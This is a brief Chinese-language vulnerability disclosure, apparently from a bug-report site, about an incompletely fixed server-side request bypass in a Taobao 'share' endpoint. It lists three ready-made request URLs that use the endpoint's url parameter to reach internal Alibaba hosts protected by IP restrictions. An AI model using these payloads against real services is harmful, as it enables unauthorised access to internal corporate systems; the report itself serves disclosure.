阿里巴巴某处漏洞修复不完整下载

现在是对ip访问基本都限制了,还有就是配置了内网ip数量比较多的域名:*.alibaba-inc.com也限制了但其他类型的url访问及权限绕过还是有不少的,这里我看了一下,大致分三种的权限绕过访问没处理(其实就是一种:公司所有域名):

1.比较多的是,配置内网ip的域名,如:http://share.jianghu.taobao.com/share/addShare.htm?title=&url=wiki.aliyun-inc.com

2.域名配置外网ip,但外网访问有ip限制:http://share.jianghu.taobao.com/share/addShare.htm?title=&url=bi.aliyun-inc.com

3.对页面访问有ip限制:
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=gtools.alibabalabs.com/uc/index.php